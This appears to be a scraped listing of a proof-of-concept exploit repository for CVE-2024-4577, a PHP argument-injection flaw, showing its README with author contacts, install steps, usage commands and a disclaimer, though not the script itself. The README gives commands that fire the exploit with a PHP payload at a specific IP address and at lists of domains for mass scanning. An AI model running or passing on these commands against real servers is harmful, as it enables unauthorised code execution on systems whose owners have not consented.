CVE-2024-4577 PoC — PHP 操作系统命令注入漏洞

Source

Associated Vulnerability

Readme

## PreView
<pre>

    ██╗  ██╗ ██████╗ ██╗  ██╗ ██████╗ ██╗  ██╗     ███████╗███████╗ ██████╗
    ██║ ██╔╝██╔═══██╗██║ ██╔╝██╔═══██╗██║ ██╔╝     ██╔════╝██╔════╝██╔════╝
    █████╔╝ ██║   ██║█████╔╝ ██║   ██║█████╔╝█████╗███████╗█████╗  ██║     
    ██╔═██╗ ██║   ██║██╔═██╗ ██║   ██║██╔═██╗╚════╝╚════██║██╔══╝  ██║     
    ██║  ██╗╚██████╔╝██║  ██╗╚██████╔╝██║  ██╗     ███████║███████╗╚██████╗
    ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═╝     ╚══════╝╚══════╝ ╚═════╝                                                                                           
     ====================================================================
     **                  Instagram : @risky.manuel                     **
     **                  Telegram  : @kikikokok9                       **
     **                  Email     : riskymanuel08@proton.me           **
     ====================================================================

# CVE-2024-4577
Argument injection vulnerability in PHP0

## INSTALL

git clone https://github.com/gotr00t0day/CVE-2024-4577.git

cd CVE-2024-4577

pip3 install -r requirements.txt --break-system-packages

# Scan A Target

python3 CVE-2024-4577.py -t https://160.153.61.66/ -c "<?phpphpinfo();?>"

# Scan a list of Targets

python3 CVE-2024-4577.py -f domains.txt -c  "<?phpphpinfo();?>"

Liat di website ini secara detail dan mendalam
https://nvd.nist.gov/vuln/detail/CVE-2024-4577

## Disclaimer
"Penggunaan tools ini sepenuhnya merupakan tanggung jawab pengguna. Saya tidak bertanggung jawab atas segala kerugian, kerusakan, atau konsekuensi yang mungkin timbul dari penggunaan yang tidak sesuai atau melanggar hukum. Pengguna diharapkan untuk mematuhi semua peraturan dan undang-undang yang berlaku."

File Snapshot

 [4.0K]  /data/pocs/b8cecfd8e3c3219959c0c12b00b029233b50e171
├── [2.0K]  CVE-2024-4577.py
├── [2.4K]  README.md
└── [  18]  requirements.txt

0 directories, 3 files

Remarks